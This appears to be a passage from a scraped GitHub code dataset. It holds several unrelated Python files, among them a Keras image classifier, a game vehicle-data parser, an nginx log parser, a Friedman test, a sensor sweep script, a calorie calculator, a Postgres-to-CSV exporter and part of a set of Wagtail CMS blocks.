Learning/QuestionUserAttention/dkt/my_model.py","file_name":"my_model.py","file_ext":"py","file_size_in_byte":9079,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"28108414557","text":"from keras import Sequential\nfrom keras import backend as K\nfrom keras.optimizers import Adam\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.utils import np_utils\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.layers import Conv2D, Activation, MaxPooling2D, Flatten, Dropout, Dense, ZeroPadding2D, GlobalAveragePooling2D\n\n\ndef model_setup():\n ###############################\n ##Zmiana modelu##\n ###############################\n\n shape = 294 # tutaj zmieniamy wymiary\n channels = 3 # a tutaj kanały\n\n model = Sequential()\n model.add(Conv2D(filters=32, kernel_size=(5, 5), activation='relu', input_shape=(shape, shape, channels)))\n model.add(Conv2D(filters=32, kernel_size=(3, 3), activation='relu', input_shape=(shape, shape, channels)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n \n\n model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu', input_shape=(shape, shape, channels)))\n model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu', input_shape=(shape, shape, channels)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n \n\n model.add(Conv2D(filters=128, kernel_size=(3, 3), activation='relu', input_shape=(shape, shape, channels)))\n model.add(Conv2D(filters=128, kernel_size=(3, 3), activation='relu', input_shape=(shape, shape, channels)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n \n\n model.add(Conv2D(filters=256, kernel_size=(3, 3), activation='relu', input_shape=(shape, shape, channels)))\n model.add(Conv2D(filters=256, kernel_size=(3, 3), activation='relu', input_shape=(shape, shape, channels)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n \n\n model.add(Flatten())\n model.add(Dense(440, activation='relu'))\n model.add(Dropout(0.3)) # dropout 1\n model.add(Dense(220, activation='relu'))\n model.add(Dense(110, activation='softmax'))\n model.add(Dropout(0.3)) # d\n model.add(Dense(110, activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='Adam',\n metrics=[\n 'accuracy',\n 'mse',\n 'AUC']\n )\n \n\n return model\n\n","repo_name":"matchodura/Messier-Object-Identification","sub_path":"gui/model_creation.py","file_name":"model_creation.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5778116437","text":"from functools import partial\nimport parseFiles\nimport intMountsInfo\n\ndef createExecContext():\n contextToOverwrite = intMountsInfo.createExecContext()\n sfxStrings = parseFiles.parseStringsFromFile(\"sfx.strings.cs\")\n result = {\n \"vehicles\": [],\n \"H\": \"human\",\n \"C\": \"cybrid\",\n \"X\": \"xl\",\n \"x\": \"xl\",\n \"S\": \"small\",\n \"L\": \"large\",\n \"M\": \"medium\",\n \"T\": \"top\",\n \"B\": \"bottom\",\n \"L\": \"left\",\n \"R\": \"right\",\n \"I\": \"internal\",\n \"LeftPod\": \"leftPod\",\n \"Left_WingA\": \"leftWingA\",\n \"Right_WingA\": \"rightWingA\",\n \"tankLeftPod\": \"tankLeftPod\",\n \"tankRightPod\": \"tankRightPod\",\n \"TankLeftPod\": \"tankLeftPod\",\n \"TankRightPod\": \"tankRightPod\",\n \"Bumper\": \"bumper\",\n \"RightPod\": \"rightPod\",\n \"TopPod\": \"topPod\",\n \"TopPodA\": \"topPodA\",\n \"TopPodB\": \"topPodB\",\n \"LeftServos\": \"leftServos\",\n \"RightServos\": \"rightServos\",\n 
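# mixed-case node names normalized to their camelCase equivalents\n        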
\"Pelvis\": \"pelvis\",\n \"none\": None,\n \"LeftWing1\": \"leftWing1\",\n \"RightWing1\": \"RightWing1\",\n \"LeftWing2\": \"leftWing2\",\n \"RightWing2\": \"RightWing2\",\n \"LeftEngine1\": \"leftEngine1\",\n \"RightEngine1\": \"rightEngine1\",\n \"LeftEngine2\": \"leftEngine2\",\n \"RightEngine2\": \"rightEngine2\",\n \"FlyerLeftFoot1\": \"flyerLeftFoot1\",\n \"FlyerLeftFoot2\": \"flyerLeftFoot2\",\n \"FlyerRightFoot1\": \"flyerRightFoot1\",\n \"FlyerRightFoot2\": \"flyerRightFoot2\",\n \"CargoA\": \"cargoA\",\n \"CargoB\": \"cargoB\",\n \"Tail\": \"tail\",\n \"LeftLeg\": \"leftLeg\",\n \"RightLeg\": \"rightLeg\",\n \"LeftLegA\": \"leftLegA\",\n \"RightLegA\": \"rightLegA\",\n \"LeftLegB\": \"leftLegB\",\n \"RightLegB\": \"rightLegB\",\n \"LeftLegC\": \"leftLegC\",\n \"RightLegC\": \"rightLegC\",\n \"LeftCalf\": \"leftCalf\",\n \"RightCalf\": \"rightCalf\",\n \"LeftFoot\": \"leftFoot\",\n \"RightFoot\": \"rightFoot\",\n \"LeftThigh\": \"leftThigh\",\n \"RighThigh\": \"rightThigh\",\n \"RightThigh\": \"rightThigh\",\n \"TankHead\": \"tankHead\",\n \"FlyerHead\": \"flyerHead\",\n \"Body\": \"body\",\n \"FlyerBody\": \"flyerBody\",\n \"LeftTread\": \"leftTread\",\n \"RightTread\": \"rightTread\",\n \"LeftTreadA\": \"leftTreadA\",\n \"RightTreadA\": \"rightTreadA\",\n \"LeftTreadB\": \"leftTreadB\",\n \"RightTreadB\": \"rightTreadB\",\n \"thermalDiffuser\": \"thermalDiffuser\",\n \"RearTread\": \"readTread\",\n \"CenterTread\": \"centerTread\",\n \"Pilot\": \"pilot\",\n \"Engine\": \"engine\",\n \"Armor\": \"armor\",\n \"Reactor\": \"reactor\",\n \"Head\": \"head\",\n \"Computer\": \"computer\",\n \"ElectroHull\": \"electroHull\",\n \"Shield\": \"shield\",\n \"Sensors\": \"sensor\",\n \"true\": True,\n \"false\": False,\n \"TRUE\": True,\n \"FALSE\": False,\n \"vehicleIsPilotable\": True,\n \"vehicleIsArtillery\": False,\n \"BASL\": \"BASL\",\n \"PROM\": \"PROM\",\n \"RBARTL\": \"RBARTL\",\n \"TRNIKE\": \"TRNIKE\",\n \"TRUPSR\": \"TRUPSR\"\n }\n\n result[\"hercBase\"] = partial(hercBase, contextToOverwrite)\n result[\"tankBase\"] = partial(hercBase, contextToOverwrite)\n result[\"flyerBase\"] = partial(hercBase, contextToOverwrite)\n result[\"droneBase\"] = partial(hercBase, contextToOverwrite)\n\n result[\"hercPos\"] = partial(hercPos, contextToOverwrite)\n result[\"tankPos\"] = partial(hercPos, contextToOverwrite)\n result[\"dronePos\"] = partial(hercPos, contextToOverwrite)\n result[\"flyerPos\"] = partial(flyerPos, contextToOverwrite)\n\n result[\"hercRot\"] = partial(hercRot, contextToOverwrite)\n result[\"tankRot\"] = partial(hercRot, contextToOverwrite)\n result[\"droneRot\"] = partial(hercRot, contextToOverwrite)\n result[\"flyerRot\"] = partial(flyerRot, contextToOverwrite)\n\n result[\"hercAnim\"] = partial(hercAnim, contextToOverwrite)\n result[\"tankAnim\"] = partial(tankAnim, contextToOverwrite)\n result[\"droneAnim\"] = partial(tankAnim, contextToOverwrite)\n result[\"hercAnim\"] = partial(hercAnim, contextToOverwrite)\n\n result[\"hercCpit\"] = partial(hercCpit, contextToOverwrite)\n result[\"tankCpit\"] = partial(hercCpit, contextToOverwrite)\n result[\"flyerCpit\"] = partial(hercCpit, contextToOverwrite)\n\n result[\"hercColl\"] = partial(hercColl, contextToOverwrite)\n result[\"droneColl\"] = partial(hercColl, contextToOverwrite)\n result[\"tankColl\"] = partial(hercColl, contextToOverwrite)\n result[\"flyerColl\"] = partial(hercColl, contextToOverwrite)\n\n result[\"hercAI\"] = partial(hercAI, contextToOverwrite)\n result[\"tankAI\"] = partial(hercAI, 
contextToOverwrite)\n result[\"flyerAI\"] = partial(hercAI, contextToOverwrite)\n\n result[\"flyerExhaust\"] = partial(flyerExhaust, contextToOverwrite)\n result[\"flyerExhaustOffset\"] = partial(flyerExhaustOffset, contextToOverwrite)\n result[\"flyerNav\"] = partial(flyerNav, contextToOverwrite)\n result[\"flyerSound\"] = partial(flyerSound, contextToOverwrite)\n\n result[\"tankSound\"] = partial(tankSound, contextToOverwrite)\n result[\"droneSound\"] = partial(tankSound, contextToOverwrite)\n result[\"tankSlide\"] = partial(tankSlide, contextToOverwrite)\n\n result[\"newHardPoint\"] = partial(newHardPoint, contextToOverwrite)\n result[\"newMountPoint\"] = partial(newMountPoint, contextToOverwrite)\n result[\"newComponent\"] = partial(newComponent, contextToOverwrite)\n result[\"newConfiguration\"] = partial(newConfiguration, contextToOverwrite)\n result[\"defaultWeapons\"] = partial(defaultWeapons, contextToOverwrite)\n result[\"defaultMountables\"] = partial(defaultMountables, contextToOverwrite)\n result[\"vehiclePilotable\"] = partial(vehiclePilotable, contextToOverwrite)\n result[\"vehicleArtillery\"] = partial(vehicleArtillery, contextToOverwrite)\n result[\"translucentCockpit\"] = partial(translucentCockpit, contextToOverwrite)\n result[\"hercFootprint\"] = partial(hercFootprint, contextToOverwrite)\n result[\"HardPointDamage\"] = partial(HardPointDamage, contextToOverwrite)\n result[\"HardPointSpecial\"] = partial(HardPointSpecial, contextToOverwrite)\n result[\"hardPointSpecial\"] = partial(HardPointSpecial, contextToOverwrite)\n result[\"droneExplosion\"] = partial(droneExplosion, contextToOverwrite)\n result[\"genericDrone\"] = partial(genericDrone, contextToOverwrite)\n\n for key in sfxStrings:\n contextToOverwrite[key] = sfxStrings[key]\n\n for key in result:\n contextToOverwrite[key] = result[key]\n\n return contextToOverwrite\n\ndef vehiclePilotable(context, value):\n context[\"vehicleIsPilotable\"] = value\n\ndef vehicleArtillery(context, value):\n context[\"vehicleIsArtillery\"] = value\n\ndef hercBase(context, identityTag, abbreviation, shape, mass, maxMass, radarCrossSection, techLevel, combatValue):\n herc = {\n \"vehiclePilotable\": context[\"vehicleIsPilotable\"],\n \"vehicleArtillery\": context[\"vehicleIsArtillery\"],\n \"identityTag\": identityTag,\n \"abbreviation\": abbreviation,\n \"shape\": shape,\n \"mass\": mass,\n \"maxMass\": maxMass,\n \"radarCrossSection\": radarCrossSection,\n \"techLevel\": techLevel,\n \"combatValue\": combatValue,\n \"hardPoints\": [],\n \"mountPoints\": [],\n \"components\": [],\n \"configurations\": [],\n \"defaultWeapons\": [],\n \"defaultMountables\": [],\n \"pos\": None,\n \"rot\": None,\n \"anim\": None,\n \"cpit\": None,\n \"coll\": None,\n \"ai\": None,\n \"sound\": None,\n \"exhaust\": None,\n \"slide\": None,\n \"footprintType\": None\n }\n context[\"vehicleIsPilotable\"] = True\n context[\"vehicleIsArtillery\"] = False\n context[\"currentVehicle\"].update(herc)\n\n\ndef hercPos(context, maxPosAcc, minPosVel, maxForPosVel, maxRevPosVel):\n context[\"currentVehicle\"][\"pos\"] = {\n \"maxPosAcc\": maxPosAcc,\n \"minPosVel\": minPosVel,\n \"maxForPosVel\": maxForPosVel,\n \"maxRevPosVel\": maxRevPosVel\n }\n\ndef flyerPos(context, maxPosAcc, thrustMultiple, maxLiftVel, maxFallVel, maxFlyVel, fastLean):\n context[\"currentVehicle\"][\"pos\"] = {\n \"maxPosAcc\": maxPosAcc,\n \"thrustMultiple\": thrustMultiple,\n \"maxLiftVel\": maxLiftVel,\n \"maxFallVel\": maxFallVel,\n \"maxFlyVel\": maxFlyVel,\n \"fastLean\": fastLean\n 
}\n\ndef hercRot(context,minRotVel, maxRVSlow, maxRVFast, maxRVTurret = None):\n context[\"currentVehicle\"][\"rot\"] = {\n \"minRotVel\": minRotVel,\n \"maxRVSlow\": maxRVSlow,\n \"maxRVFast\": maxRVFast,\n \"maxRVTurret\": maxRVTurret\n }\n\ndef flyerRot(context, maxRotXVel, maxRotYVel, maxRotZVel):\n context[\"currentVehicle\"][\"rot\"] = {\n \"maxRotXVel\": maxRotXVel,\n \"maxRotYVel\": maxRotYVel,\n \"maxRotZVel\": maxRotZVel,\n }\n\ndef hercAnim(context, toStandVel, toRunVel, toFastRunVel, toFastTurnVel):\n context[\"currentVehicle\"][\"anim\"] = {\n \"toStandVel\": toStandVel,\n \"toRunVel\": toRunVel,\n \"toFastRunVel\": toFastRunVel,\n \"toFastTurnVel\": toFastTurnVel\n }\n\ndef tankAnim(context, treadAnimRotCoefficient, treadAnimPosCooefficent):\n context[\"currentVehicle\"][\"anim\"] = {\n \"treadAnimRotCoefficient\": treadAnimRotCoefficient,\n \"treadAnimPosCooefficent\": treadAnimPosCooefficent\n }\n\ndef hercCpit(context, offsetX, offsetY, offsetZ):\n context[\"currentVehicle\"][\"cpit\"] = {\n \"offsetX\": offsetX,\n \"offsetY\": offsetY,\n \"offsetZ\": offsetZ\n }\n\ndef hercColl(context, sphOffstX, sphOffstY, sphOffstZ, sphereRad):\n context[\"currentVehicle\"][\"coll\"] = {\n \"sphOffstX\": sphOffstX,\n \"sphOffstY\": sphOffstY,\n \"sphOffstZ\": sphOffstZ,\n \"sphereRad\": sphereRad\n }\n\ndef hercAI(context, aiName1 = None, aiName2 = None, aiName3 = None, aiName4 = None):\n context[\"currentVehicle\"][\"ai\"] = {\n \"aiName1\": aiName1,\n \"aiName2\": aiName2,\n \"aiName3\": aiName3,\n \"aiName4\": aiName4\n }\n\ndef hercFootprint(context, footprintType):\n context[\"currentVehicle\"][\"footprintType\"] = footprintType\n\ndef tankSound(context, engineSoundTag, hasThrusters):\n context[\"currentVehicle\"][\"sound\"] = {\n \"engineSoundTag\": engineSoundTag,\n \"hasThrusters\": hasThrusters\n }\n\ndef flyerSound(context, startupTag, shutdownTag, flyTag, damagedFlyTag):\n context[\"currentVehicle\"][\"sound\"] = {\n \"startupTag\": startupTag,\n \"shutdownTag\": shutdownTag,\n \"flyTag\": flyTag,\n \"damagedFlyTag\": damagedFlyTag\n }\n\ndef tankSlide(context, slideCoefficient):\n context[\"currentVehicle\"][\"slide\"] = {\n \"slideCoefficient\": slideCoefficient\n }\n\ndef flyerExhaust(context, exhaustShapeT, exhaustShapeNT, numberOfSources):\n context[\"currentVehicle\"][\"exhaust\"] = {\n \"exhaustShapeT\": exhaustShapeT,\n \"exhaustShapeNT\": exhaustShapeNT,\n \"numberOfSources\": numberOfSources,\n \"offsets\": []\n }\n\ndef flyerExhaustOffset(context, *values):\n context[\"currentVehicle\"][\"exhaust\"][\"offsets\"].append(values)\n\ndef flyerNav(context, maxLean, maxBank, taxiRange, shortRange, mediumRange):\n context[\"currentVehicle\"][\"nav\"] = {\n \"maxLean\": maxLean,\n \"maxBank\": maxBank,\n \"taxiRange\": taxiRange,\n \"shortRange\": shortRange,\n \"mediumRange\": mediumRange\n }\n\ndef droneExplosion(context, *values):\n context[\"currentVehicle\"][\"droneExplosion\"] = values\n\ndef translucentCockpit(context):\n context[\"currentVehicle\"][\"cpit\"][\"translucent\"] = True\n\ndef newHardPoint(context, hardpointId, size, side, dmgParent, offsetFromNodeX, offsetFromNodeY, offsetFromNodeZ, xRotationRangeMin, xRotationRangeMax, zRotationRangeMin, zRotationRangeMax):\n context[\"currentVehicle\"][\"hardPoints\"].append({\n \"hardpointId\": hardpointId,\n \"size\": size,\n \"side\": side,\n \"dmgParent\": dmgParent,\n \"offsetFromNode\": [offsetFromNodeX, offsetFromNodeY, offsetFromNodeZ],\n \"xRotationRange\": [xRotationRangeMin, xRotationRangeMax],\n 
\"zRotationRange\": [zRotationRangeMin, zRotationRangeMax]\n })\n\ndef HardPointDamage(context, damageValue):\n context[\"currentVehicle\"][\"hardPoints\"][-1][\"damage\"] = damageValue\n\ndef HardPointSpecial(context, specialValue):\n context[\"currentVehicle\"][\"hardPoints\"][-1][\"special\"] = specialValue\n\ndef newMountPoint(context, mountPointId, size, dmgParent, *allowedMountables):\n mountPoint = {\n \"mountPointId\": mountPointId,\n \"size\": size,\n \"dmgParent\": dmgParent,\n \"allowedMountables\": []\n }\n\n for mountable in allowedMountables:\n mountPoint[\"allowedMountables\"].append(mountable)\n context[\"currentVehicle\"][\"mountPoints\"].append(mountPoint)\n\n\ndef newComponent(context, componentId, componentType, parent, maxDamage, identityTag):\n context[\"currentVehicle\"][\"components\"].append({\n \"componentId\": componentId,\n \"componentType\": componentType,\n \"parent\": parent,\n \"maxDamage\": maxDamage,\n \"identityTag\": identityTag\n })\n\ndef newConfiguration(context, containee, containter, internalPercentage):\n context[\"currentVehicle\"][\"configurations\"].append({\n \"containee\": containee,\n \"container\": containter,\n \"internalPercentage\": internalPercentage\n })\n\ndef defaultWeapons(context, *weapons):\n for weapon in weapons:\n context[\"currentVehicle\"][\"defaultWeapons\"].append(weapon)\n\ndef defaultMountables(context, *mountables):\n for mountable in mountables:\n context[\"currentVehicle\"][\"defaultMountables\"].append(mountable)\n\ndef genericDrone(context, cargoCount):\n context[\"currentVehicle\"][\"cargoCount\"] = cargoCount\n globalStrings = parseFiles.parseStringsFromFile(\"Sim.Strings.cs\")\n\n # manually parsing the file for now, because we know the structure\n # of datDroneGeneric and we don't need any other script files to make all this work.\n with open(\"datDroneGeneric.cs\", \"r\") as genericFile:\n lines = genericFile.read().splitlines()\n currentBlock = \"\"\n for index, line in enumerate(lines):\n if currentBlock == \"if\":\n currentBlock = \"\"\n continue\n line = line.strip()\n line = currentBlock + line\n\n if line.startswith(\"{\") or line.startswith(\"}\"):\n line = line.replace(\"{\", \"\").replace(\"}\", \"\")\n\n if line.startswith(\"function\") or line == \"\":\n continue\n\n if \"%cargoCount\" in line:\n line = line.replace(\"%cargoCount\", str(cargoCount))\n if line.startswith(\"if\"):\n line = line + \":\"\n nextLine = \"\\t\" + lines[index + 1].replace(\"{\", \"\").replace(\"}\", \"\").strip()\n line = \"\\n\".join([line, nextLine])\n currentBlock = \"if\"\n exec(line, globalStrings, context)","repo_name":"open-siege/open-siege","sub_path":"3space/tools/legacy/veh-parser/vehicleInfo.py","file_name":"vehicleInfo.py","file_ext":"py","file_size_in_byte":14895,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"72"} +{"seq_id":"21913468120","text":"import os\nfrom abipy.flowtk import PseudoTable\n\n_root = os.path.dirname(__file__)\n_paths = [f for f in os.listdir(_root) if f.endswith(\"hgh\")]\n# Need one pseudo for element\nd = {}\nfor p in _paths:\n i = p.index(\".\")\n head, tail = p[:i], p[i:]\n d[head] = tail\n\n_paths = [k + v for k, v in d.items()]\n_paths = [os.path.join(_root, f) for f in _paths]\ndel d\n\nHGH_TABLE = PseudoTable(_paths)\n\n# Add fake hints.\nfor pseudo in HGH_TABLE:\n pseudo.dojo_report = {}\n pseudo.dojo_report[\"hints\"] = {}\n for accuracy in [\"low\", \"normal\", \"high\"]:\n pseudo.dojo_report[\"hints\"][accuracy] = {\"ecut\": 50}\n 
    #assert pseudo.has_hints\n","repo_name":"abinit/abipy","sub_path":"abipy/data/hgh_pseudos/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"72"} +{"seq_id":"9625607482","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys\nfrom re import match\n\nPATTERN = r'(?P<time>[\\d+/ :]+) \\[(?P<level>.+)\\] .*?: (?P<message>.+), client: (?P<client>.+), server: (?P<server>.+), request: (?P<request>.+), host: (?P<host>.+)'\n\n\ndef convert_nginx_log_to_dict():\n    \"\"\"Read nginx log lines from stdin through a pipe (|) and convert them to dicts.\n\n    Returns:\n        list -- parsed nginx log entries\n    \"\"\"\n    nginx_logs = list()\n    lines = sys.stdin.readlines()\n    if not lines:\n        return nginx_logs\n\n    for line in lines:\n        pattern = match(PATTERN, line)\n        log = pattern.groupdict()\n        nginx_logs.append(log)\n\n    return nginx_logs\n","repo_name":"dohyungp/code-snippets","sub_path":"python-snippets/nginx_log_parser.py","file_name":"nginx_log_parser.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35770688388","text":"import numpy as np\nimport scipy.stats as stats\n\n# A drug's effect on patients' blood pressure was studied. First,\n# pressure was measured before taking the drug, then again after 10 minutes and after 30 minutes. Are\n# there statistically significant differences between the pressure measurements? The samples do not satisfy the normality condition.\n# 1st measurement, before taking the drug: 150, 160, 165, 145, 155\n# 2nd measurement, after 10 minutes: 140, 155, 150, 130, 135\n# 3rd measurement, after 30 minutes: 130, 130, 120, 130, 125\n\nalpha = 0.05\nx1 = np.array([150, 160, 165, 145, 155])\nx2 = np.array([140, 155, 150, 130, 135])\nx3 = np.array([130, 130, 120, 130, 125])\n\nstat = stats.friedmanchisquare(x1, x2, x3)\nprint(stat)\nprint('pvalue < alpha, H0 is rejected, statistically significant differences are present!'\n      '\nThe drug works!')\n","repo_name":"ravenlexa/Home_work","sub_path":"Seminar_7/Task_2.py","file_name":"Task_2.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19578478267","text":"import time\nimport pandas as pd\nfrom LSGW.RequestsSensorsLight import *\nfrom config.config import *\nfrom datetime import datetime\n\nnow = datetime.now()\n\ncurrent_time = now.strftime(\"%d_%m_%Y_%H_%M_%S\")\narr = []\nfor cct_value in range(2700, 6700, 400):\n    cct(cct_value)\n    print(cct_value)\n    for dim_value in range(0, 110, 10):\n        dim(dim_value)\n        print(dim_value)\n        time.sleep(timeValue)\n        reading = getSensorLight()  # read the sensor once per sample\n        arr.append((cct_value, dim_value, reading))\n        print(arr)\n        # rewrite the report after every sample\n        csv = pd.DataFrame(arr).to_csv(sensorsName + '_report_' + current_time + '.csv')\n\n","repo_name":"valeriia7/Gateway-API-EU","sub_path":"LSGW/SensorControl.py","file_name":"SensorControl.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24982642541","text":"import os\nimport shutil\nimport uuid\n\nfrom app.support.support import setup_app\n\nTEST_DATA_FILE_PATH = './tests/data/users.csv'\nTMP_FILE_PATH = './tmp'\n\n\ndef setup_app_for_test(app):\n    assert os.path.exists(TEST_DATA_FILE_PATH)\n\n    if not os.path.exists(TMP_FILE_PATH):\n        os.mkdir(TMP_FILE_PATH)\n\n    test_data_file_name = str(uuid.uuid4())\n\n    test_file_name = os.path.join(TMP_FILE_PATH, test_data_file_name)\n
    shutil.copy(TEST_DATA_FILE_PATH, test_file_name)\n\n    setup_app(app, test_file_name)\n","repo_name":"ei-roslyakov/flask_rest_api_csv","sub_path":"tests/shared.py","file_name":"shared.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2033851725","text":"numeros = []\ntotal = 0\nnumero = 0\ncontador = 0\n\nwhile numero < 6:\n    valor = input()\n    numeros.append(valor)\n    numero += 1\n\n\nfor num in numeros:\n    if float(num) > 0:\n        contador += 1\n        total += float(num)\n\nmedia = total / contador\n\nprint(\"{} valores positivos\".format(contador))\nprint(\"{:.1f}\".format(media))","repo_name":"viniielopes/uri","sub_path":"iniciante/1064.py","file_name":"1064.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5641365086","text":"print(\"=============================\")\nprint(\"======Macro Calculator=======\")\nprint(\"=============================\")\n# Collecting the user's physical characteristics and training frequency:\n# Physical build:\naltura = int(input(\"Enter your height (cm): \"))\npeso = int(input(\"Enter your weight (kg): \"))\nidade = int(input(\"Enter your age (years): \"))\nsexo = int(input('''Enter your sex:\n[1] Male\n[2] Female '''))\n# Day-to-day activity:\natv_cotidiana = int(input('''What are you like outside the gym?\n[1] Sedentary (most of the day sitting / office work)\n[2] Moderately active (most of the day walking or doing some activity)\n[3] Very active (manual labor / makes deliveries by bike) '''))\n# About weight training:\nfreq_musculação = int(\n    input(\"Enter the number of times per week you do weight training: \"))\ntempo_musculação = int(input(\n    \"How long, on average, does your weight-training session last (time in minutes)? \"))\nintensidade_musculação = int(input('''How hard do you train with weights?\n[1] Light training\n[2] Intense training\n[3] I train like a damn bodybuilder!!! '''))\n# About cardio:\nfreq_aeróbico = int(\n    input(\"Enter the number of times per week you do cardio: \"))\ntempo_aeróbico = int(input(\n    \"How long, on average, does your cardio session last (time in minutes)?
\"))\nintensidade_aeróbico = int(input('''Com que intensidade vc treina aeróbico?\n[1] Aeróbico pouco intenso\n[2] Aeróbico intenso\n[3] Aeróbico muito intenso '''))\n# Objetivo:\nobjetivo = int(input('''Qual é o seu ojetivo?\n[1] Hipertrofia\n[2] Perder peso '''))\n# ----------------------------------------------------------------------------------\n# Calculando a Taxa Metabólica Basal (TMB):\n# P/ Homens:\nif(sexo == 1):\n taxa_met_basal = 66.5 + (13.75 * peso) + (5.0 * altura) - (6.8 * idade)\n print(\"Sua taxa metabólica basal é {:.2f} kcal\".format(taxa_met_basal))\n# P/ Mulheres:\nelse:\n taxa_met_basal = 665.0 + (9.60 * peso) + (1.8 * altura) - (4.7 * idade)\n print(\"Sua taxa metabólica basal é {:.2f} kcal\".format(taxa_met_basal))\n# ----------------------------------------------------------------------------------\n# Calculando o Gasto Energético com Atividade Física:\n# P/ Musculação:\nif(intensidade_musculação == 1):\n met_musculação = 4.0\nelif(intensidade_musculação == 2):\n met_musculação = 4.5\nelif(intensidade_musculação == 3):\n met_musculação = 6.0\ngasto_musculação = met_musculação * peso * tempo_musculação/60\n# P/ Aeróbico:\nif(intensidade_aeróbico == 1):\n met_aeróbico = 5.0\nelif(intensidade_aeróbico == 2):\n met_aeróbico = 6.5\nelif(intensidade_aeróbico == 3):\n met_aeróbico = 7.0\ngasto_aeróbico = met_aeróbico * peso * tempo_aeróbico/60\n# Gasto energético cotidiano (fora da academia):\nif(atv_cotidiana == 1):\n gasto_cotidiano = 200\nelif(atv_cotidiana == 2):\n gasto_cotidiano = 300\nelif(atv_cotidiana == 3):\n gasto_cotidiano = 400\n# Gasto energético com a atividade física:\ngasto_atv_física = gasto_musculação + gasto_aeróbico + gasto_cotidiano\n# ----------------------------------------------------------------------------------\n# Calculando o Gasto Energético Total Diário:\ngasto_total = taxa_met_basal + gasto_atv_física\nprint(\"O seu gasto calórico diário é {} kcal\".format(gasto_total))\n","repo_name":"williamSouza21/exercicios-em-python","sub_path":"Calculadora_de_macros.py","file_name":"Calculadora_de_macros.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20377228127","text":"import csv\nimport psycopg2\nimport traceback\n\ndef get_location_distances():\n distancias = None\n try:\n conn = psycopg2.connect(database='assistcargo', user='*', password='*', host='localhost')\n cur = conn.cursor()\n\n cur.execute(\"SELECT ubicacion_id_origen, ubicacion_id_destino, tiempo FROM distancias;\")\n distancias = cur.fetchall()\n except Exception:\n traceback.print_exc()\n\n if distancias:\n distancias_list = []\n for orig, dest, time in distancias:\n distancias_list.append({\n 'ORIGEN': orig,\n 'DESTINO': dest,\n 'DISTANCIA': int(time) if time != 0 else -1\n })\n distancias_list.append({\n 'ORIGEN': dest,\n 'DESTINO': orig,\n 'DISTANCIA': int(time) if time != 0 else -1\n })\n return distancias_list\n else:\n return []\n\n\nif __name__ == '__main__':\n distances = get_location_distances()\n\n keys = distances[0].keys()\n with open('./csvs/distances.csv', 'w', newline='') as output_file:\n dict_writer = csv.DictWriter(output_file, keys)\n dict_writer.writeheader()\n dict_writer.writerows(distances)\n","repo_name":"danilosim/optimizacion-data-logis","sub_path":"distances_csv.py","file_name":"distances_csv.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"10564110641","text":"import uuid\n\nfrom datetime import datetime\nfrom django.utils.translation import gettext_lazy as _\nfrom django.utils.functional import cached_property\nfrom django.utils.safestring import mark_safe\n\nfrom wagtail.blocks.field_block import (BooleanBlock, CharBlock, ChoiceBlock, PageChooserBlock,\n RawHTMLBlock, RichTextBlock as _RichTextBlock, URLBlock, IntegerBlock, Block)\nfrom wagtail.blocks.list_block import ListBlock\nfrom wagtail.blocks.stream_block import StreamBlock\nfrom wagtail.blocks.struct_block import StructBlock\nfrom wagtail.blocks import StructValue\nfrom wagtail.embeds.blocks import EmbedBlock as _EmbedBlock\nfrom wagtail.images.blocks import ImageChooserBlock as _ImageChooserBlock\nfrom wagtail.documents.blocks import DocumentChooserBlock\nfrom wagtail.snippets.blocks import SnippetChooserBlock\n\nfrom bakeup.shop.models import ProductionDay, Product\n\n\nclass EmbedBlock(_EmbedBlock):\n class Meta:\n template = 'blocks/embed_block.html'\n\n\nclass TextAlignmentChoiceBlock(ChoiceBlock):\n choices = [\n ('start', 'Left'), \n ('center', 'Centre'), \n ('end', 'Right'),\n ('justify', 'Justified'), \n ]\n\n\nclass ImageAlignmentChoiceBlock(ChoiceBlock):\n choices = [\n ('start', 'Left'), \n ('center', 'Centre'), \n ('end', 'Right'),\n ]\n\n\nclass RichTextBlock(StructBlock):\n alignment = TextAlignmentChoiceBlock(\n default = 'start',\n label = \"Text Alignment\"\n )\n text = _RichTextBlock()\n\n class Meta:\n template = 'blocks/richtext_block.html'\n label = \"Text\"\n icon = 'pilcrow'\n\n\nclass ColourThemeChoiceBlock(ChoiceBlock):\n choices = [\n ('primary', 'Primary'),\n ('secondary', 'Secondary'),\n ('success', 'Green'),\n ('danger', 'Red'),\n ('warning', 'Yellow'),\n ('info', 'Blue'),\n ('light', 'Light'),\n ('dark', 'Dark'),\n ]\n\n\nclass ImageChooserBlock(StructBlock):\n alignment = ImageAlignmentChoiceBlock(default='start')\n image = _ImageChooserBlock()\n\n class 